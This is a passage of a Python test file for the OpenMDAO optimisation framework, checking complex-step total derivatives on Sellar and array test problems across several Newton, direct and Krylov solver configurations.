sub2.add_subsystem('tgtC', TgtCompC())
sub2.add_subsystem('tgtK', TgtCompK())
prob.model.connect('x1', 'sub1.src.x1')
prob.model.connect('sub1.src.x2', 'sub2.tgtF.x2')
prob.model.connect('sub1.src.x2', 'sub2.tgtC.x2')
prob.model.connect('sub1.src.x2', 'sub2.tgtK.x2')
sub2.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.run_model()
assert_near_equal(prob['sub1.src.x2'], 100.0, 1e-6)
assert_near_equal(prob['sub2.tgtF.x3'], 212.0, 1e-6)
assert_near_equal(prob['sub2.tgtC.x3'], 100.0, 1e-6)
assert_near_equal(prob['sub2.tgtK.x3'], 373.15, 1e-6)
wrt = ['x1']
of = ['sub2.tgtF.x3', 'sub2.tgtC.x3', 'sub2.tgtK.x3']
J = prob.compute_totals(of=of, wrt=wrt, return_format='dict')
assert_near_equal(J['sub2.tgtF.x3']['x1'][0][0], 1.8, 1e-6)
assert_near_equal(J['sub2.tgtC.x3']['x1'][0][0], 1.0, 1e-6)
assert_near_equal(J['sub2.tgtK.x3']['x1'][0][0], 1.0, 1e-6)
# Check the total derivatives in reverse mode
prob.setup(check=False, mode='rev', local_vector_class=vec_class)
prob.run_model()
J = prob.compute_totals(of=of, wrt=wrt, return_format='dict')
assert_near_equal(J['sub2.tgtF.x3']['x1'][0][0], 1.8, 1e-6)
assert_near_equal(J['sub2.tgtC.x3']['x1'][0][0], 1.0, 1e-6)
assert_near_equal(J['sub2.tgtK.x3']['x1'][0][0], 1.0, 1e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_sellar_'+'_'.join(title(a) for a in p.args))
def test_sellar(self, vec_class):
# Basic sellar test.
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = self.prob
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
model.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
model.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
prob.model.nonlinear_solver = om.NonlinearBlockGS()
prob.model.nonlinear_solver.options['atol'] = 1e-50
prob.model.nonlinear_solver.options['rtol'] = 1e-50
model.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
self.assertFalse(model._vectors['output']['linear']._alloc_complex,
msg="Linear vector should not be allocated as complex.")
def test_desvar_and_response_with_indices(self):
class ArrayComp2D(om.ExplicitComponent):
"""
A fairly simple array component.
"""
def setup(self):
self.JJ = np.array([[1.0, 3.0, -2.0, 7.0],
[6.0, 2.5, 2.0, 4.0],
[-1.0, 0.0, 8.0, 1.0],
[1.0, 4.0, -5.0, 6.0]])
# Params
self.add_input('x1', np.zeros([4]))
# Unknowns
self.add_output('y1', np.zeros([4]))
self.declare_partials(of='*', wrt='*')
def compute(self, inputs, outputs):
"""
Execution.
"""
outputs['y1'] = self.JJ.dot(inputs['x1'])
def compute_partials(self, inputs, partials):
"""
Analytical derivatives.
"""
partials[('y1', 'x1')] = self.JJ
prob = om.Problem()
model = prob.model
mycomp = model.add_subsystem('mycomp', ArrayComp2D(), promotes=['x1', 'y1'])
model.add_design_var('x1', indices=[1, 3])
model.add_constraint('y1', indices=[0, 2])
prob.set_solver_print(level=0)
model.approx_totals(method='cs')
prob.setup(check=False, mode='fwd')
prob.run_model()
Jbase = mycomp.JJ
of = ['y1']
wrt = ['x1']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['y1', 'x1'][0][0], Jbase[0, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][0][1], Jbase[0, 3], 1e-8)
assert_near_equal(J['y1', 'x1'][1][0], Jbase[2, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][1][1], Jbase[2, 3], 1e-8)
def test_desvar_with_indices(self):
# Just desvars on this one to cover code missed by desvar+response test.
class ArrayComp2D(om.ExplicitComponent):
"""
A fairly simple array component.
"""
def setup(self):
self.JJ = np.array([[1.0, 3.0, -2.0, 7.0],
[6.0, 2.5, 2.0, 4.0],
[-1.0, 0.0, 8.0, 1.0],
[1.0, 4.0, -5.0, 6.0]])
# Params
self.add_input('x1', np.zeros([4]))
# Unknowns
self.add_output('y1', np.zeros([4]))
self.declare_partials(of='*', wrt='*')
def compute(self, inputs, outputs):
"""
Execution.
"""
outputs['y1'] = self.JJ.dot(inputs['x1'])
def compute_partials(self, inputs, partials):
"""
Analytical derivatives.
"""
partials[('y1', 'x1')] = self.JJ
prob = om.Problem()
model = prob.model
model.add_subsystem('x_param1', om.IndepVarComp('x1', np.ones((4))),
promotes=['x1'])
mycomp = model.add_subsystem('mycomp', ArrayComp2D(), promotes=['x1', 'y1'])
model.add_design_var('x1', indices=[1, 3])
model.add_constraint('y1')
prob.set_solver_print(level=0)
model.approx_totals(method='cs')
prob.setup(check=False, mode='fwd')
prob.run_model()
Jbase = mycomp.JJ
of = ['y1']
wrt = ['x1']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['y1', 'x1'][0][0], Jbase[0, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][0][1], Jbase[0, 3], 1e-8)
assert_near_equal(J['y1', 'x1'][2][0], Jbase[2, 1], 1e-8)
assert_near_equal(J['y1', 'x1'][2][1], Jbase[2, 3], 1e-8)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_newton_with_direct_solver_'+'_'.join(title(a) for a in p.args))
def test_newton_with_direct_solver(self, vec_class):
# Basic sellar test.
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.DirectSolver(assemble_jac=False)
sub.nonlinear_solver.options['atol'] = 1e-10
sub.nonlinear_solver.options['rtol'] = 1e-10
model.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_newton_with_direct_solver_dense_'+'_'.join(title(a) for a in p.args))
def test_newton_with_direct_solver_dense(self, vec_class):
# Basic sellar test.
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.DirectSolver()
sub.options['assembled_jac_type'] = 'dense'
sub.nonlinear_solver.options['atol'] = 1e-10
sub.nonlinear_solver.options['rtol'] = 1e-10
model.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_newton_with_direct_solver_csc_'+'_'.join(title(a) for a in p.args))
def test_newton_with_direct_solver_csc(self, vec_class):
# Basic sellar test.
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.DirectSolver()
sub.options['assembled_jac_type'] = 'csc'
sub.nonlinear_solver.options['atol'] = 1e-10
sub.nonlinear_solver.options['rtol'] = 1e-10
model.approx_totals(method='cs')
prob.setup(check=False, local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_subbed_newton_gs_'+'_'.join(title(a) for a in p.args))
def test_subbed_newton_gs(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
from openmdao.test_suite.components.sellar import SellarDis1withDerivatives, SellarDis2withDerivatives
class SellarDerivatives(om.Group):
def setup(self):
self.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
self.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
self.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
self.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
sub = self.add_subsystem('sub', om.Group(), promotes=['*'])
sub.linear_solver = om.DirectSolver(assemble_jac=True)
sub.options['assembled_jac_type'] = 'csc'
sub.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)', obj=0.0,
x=0.0, z=np.array([0.0, 0.0]), y1=0.0, y2=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
sub.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1', con1=0.0, y1=0.0),
promotes=['con1', 'y1'])
sub.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0', con2=0.0, y2=0.0),
promotes=['con2', 'y2'])
self.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
self.linear_solver = om.LinearBlockGS()
self.linear_solver.options['maxiter'] = 25
self.linear_solver.options['atol'] = 1e-16
prob = om.Problem()
prob.model = SellarDerivatives()
prob.setup()
prob.model.approx_totals(method='cs')
prob.run_model()
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_subbed_newton_gs_csc_external_mtx_'+'_'.join(title(a) for a in p.args))
def test_subbed_newton_gs_csc_external_mtx(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
from openmdao.test_suite.components.sellar import SellarDis1withDerivatives, SellarDis2withDerivatives
class SellarDerivatives(om.Group):
def setup(self):
self.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
self.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
self.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
self.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
sub = self.add_subsystem('sub', om.Group(), promotes=['*'])
sub.linear_solver = om.DirectSolver(assemble_jac=True)
sub.options['assembled_jac_type'] = 'csc'
sub.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)', obj=0.0,
x=0.0, z=np.array([0.0, 0.0]), y1=0.0, y2=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
sub.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1', con1=0.0, y1=0.0),
promotes=['con1', 'y1'])
sub.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0', con2=0.0, y2=0.0),
promotes=['con2', 'y2'])
self.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
self.linear_solver = om.LinearBlockGS()
self.linear_solver.options['maxiter'] = 25
self.linear_solver.options['atol'] = 1e-16
prob = om.Problem()
prob.model = SellarDerivatives()
prob.setup()
prob.model.approx_totals(method='cs')
prob.run_model()
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_subbed_newton_gs_dense_external_mtx_'+'_'.join(title(a) for a in p.args))
def test_subbed_newton_gs_dense_external_mtx(self, vec_class):
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
from openmdao.test_suite.components.sellar import SellarDis1withDerivatives, SellarDis2withDerivatives
class SellarDerivatives(om.Group):
def setup(self):
self.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
self.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
self.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
self.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
sub = self.add_subsystem('sub', om.Group(), promotes=['*'])
sub.linear_solver = om.DirectSolver(assemble_jac=True)
sub.options['assembled_jac_type'] = 'dense'
sub.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)', obj=0.0,
x=0.0, z=np.array([0.0, 0.0]), y1=0.0, y2=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
sub.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1', con1=0.0, y1=0.0),
promotes=['con1', 'y1'])
sub.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0', con2=0.0, y2=0.0),
promotes=['con2', 'y2'])
self.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
self.linear_solver = om.LinearBlockGS()
self.linear_solver.options['maxiter'] = 25
self.linear_solver.options['atol'] = 1e-16
prob = om.Problem()
prob.model = SellarDerivatives()
prob.setup()
prob.model.approx_totals(method='cs')
prob.run_model()
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
@parameterized.expand(itertools.product([om.DefaultVector, PETScVector]),
name_func=lambda f, n, p:
'test_newton_with_krylov_solver_'+'_'.join(title(a) for a in p.args))
def test_newton_with_krylov_solver(self, vec_class):
# Basic sellar test.
if not vec_class:
raise unittest.SkipTest("PETSc is not installed")
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.ScipyKrylov()
sub.nonlinear_solver.options['atol'] = 1e-10
sub.nonlinear_solver.options['rtol'] = 1e-10
sub.linear_solver.options['atol'] = 1e-15
model.approx_totals(method='cs', step=1e-14)
prob.setup(check=False, local_vector_class=vec_class)
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
def test_newton_with_cscjac_under_cs(self):
# Basic sellar test.
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
sub.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
sub.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.linear_solver = om.ScipyKrylov(assemble_jac=True)
sub.nonlinear_solver.options['atol'] = 1e-20
sub.nonlinear_solver.options['rtol'] = 1e-20
model.approx_totals(method='cs', step=1e-12)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
def test_newton_with_fd_group(self):
# Basic sellar test.
prob = om.Problem()
model = prob.model
sub = model.add_subsystem('sub', om.Group(), promotes=['*'])
subfd = sub.add_subsystem('subfd', om.Group(), promotes=['*'])
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
subfd.add_subsystem('d1', SellarDis1withDerivatives(), promotes=['x', 'z', 'y1', 'y2'])
subfd.add_subsystem('d2', SellarDis2withDerivatives(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
# Finite difference for the Newton linear solve only
subfd.approx_totals(method='fd')
sub.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
sub.nonlinear_solver.options['maxiter'] = 12
sub.linear_solver = om.DirectSolver(assemble_jac=False)
sub.nonlinear_solver.options['atol'] = 1e-20
sub.nonlinear_solver.options['rtol'] = 1e-20
# Complex Step for top derivatives
model.approx_totals(method='cs', step=1e-14)
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z', 'x']
of = ['obj', 'con1', 'con2']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, 1.0e-6)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, 1.0e-6)
assert_near_equal(J['obj', 'x'][0][0], 2.98061391, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][0], -9.61002186, 1.0e-6)
assert_near_equal(J['con1', 'z'][0][1], -0.78449158, 1.0e-6)
assert_near_equal(J['con1', 'x'][0][0], -0.98061448, 1.0e-6)
def test_nested_complex_step_unsupported(self):
# Basic sellar test.
prob = self.prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', 1.0), promotes=['x'])
model.add_subsystem('pz', om.IndepVarComp('z', np.array([5.0, 2.0])), promotes=['z'])
model.add_subsystem('d1', SellarDis1CS(), promotes=['x', 'z', 'y1', 'y2'])
model.add_subsystem('d2', SellarDis2CS(), promotes=['z', 'y1', 'y2'])
model.add_subsystem('obj_cmp', om.ExecComp('obj = x**2 + z[1] + y1 + exp(-y2)',
z=np.array([0.0, 0.0]), x=0.0),
promotes=['obj', 'x', 'z', 'y1', 'y2'])
model.add_subsystem('con_cmp1', om.ExecComp('con1 = 3.16 - y1'), promotes=['con1', 'y1'])
model.add_subsystem('con_cmp2', om.ExecComp('con2 = y2 - 24.0'), promotes=['con2', 'y2'])
prob.model.nonlinear_solver = om.NewtonSolver(solve_subsystems=False)
prob.model.linear_solver = om.DirectSolver(assemble_jac=False)
prob.model.approx_totals(method='cs')
prob.setup()
prob.set_solver_print(level=0)
prob.run_model()
assert_near_equal(prob['y1'], 25.58830273, .00001)
assert_near_equal(prob['y2'], 12.05848819, .00001)
wrt = ['z']
of = ['obj']
J = prob.compute_totals(of=of, wrt=wrt, return_format='flat_dict')
assert_near_equal(J['obj', 'z'][0][0], 9.61001056, .00001)
assert_near_equal(J['obj', 'z'][0][1], 1.78448534, .00001)
outs = prob.model.list_outputs(residuals=True, out_stream=None)
for name, meta in outs:
val = np.linalg.norm(meta['resids'])
self.assertLess(val, 1e-8, msg="Check if CS cleans up after itself.")
class TestComponentComplexStep(unittest.TestCase):
def test_implicit_component(self):
class TestImplCompArrayDense(TestImplCompArray):
def setup(self):
super().setup()
self.declare_partials('*', '*', method='cs')
prob = self.prob = om.Problem()
model = prob.model
model.add_subsystem('p_rhs', om.IndepVarComp('rhs', val=np.ones(2)))
sub = model.add_subsystem('sub', om.Group())
comp = sub.add_subsystem('comp', TestImplCompArrayDense())
model.connect('p_rhs.rhs', 'sub.comp.rhs')
model.linear_solver = om.ScipyKrylov()
prob.setup()
prob.run_model()
model.run_linearize()
Jfd = comp._jacobian
assert_near_equal(Jfd['sub.comp.x', 'sub.comp.rhs'], -np.eye(2), 1e-6)
assert_near_equal(Jfd['sub.comp.x', 'sub.comp.x'], comp.mtx, 1e-6)
def test_vector_methods(self):
class KenComp(om.ExplicitComponent):
def setup(self):
self.add_input('x1', np.array([[7.0, 3.0], [2.4, 3.33]]))
self.add_output('y1', np.zeros((2, 2)))
self.declare_partials('*', '*', method='cs')
def compute(self, inputs, outputs):
x1 = inputs['x1']
outputs['y1'] = x1
outputs['y1'][0][0] += 14.0
outputs['y1'][0][1] *= 3.0
outputs['y1'][1][0] -= 6.67
outputs['y1'][1][1] /= 2.34
outputs['y1'] *= 1.0
prob = self.prob = om.Problem()
model = prob.model
model.add_subsystem('px', om.IndepVarComp('x', val=np.array([[7.0, 3.0], [2.4, 3.33]])))
model.add_subsystem('comp', KenComp())
model.connect('px.x', 'comp.x1')
prob.setup()
prob.run_model()
of = ['comp.y1']
wrt = ['px.x']
derivs = prob.compute_totals(of=of, wrt=wrt)
assert_near_equal(derivs['comp.y1', 'px.x'][0][0], 1.0, 1e-6)
assert_near_equal(derivs['comp.y1', 'px.x'][1][1], 3.0, 1e-6)
assert_near_equal(derivs['comp.y1', 'px.x'][2][2], 1.0, 1e-6)
assert_near_equal(derivs['comp.y1', 'px.x'][3][3], 1.0/2.34, 1e-6)
def test_sellar_comp_cs(self):
# Basic sellar test.
prob = self.prob = om.Problem()
model = prob.model
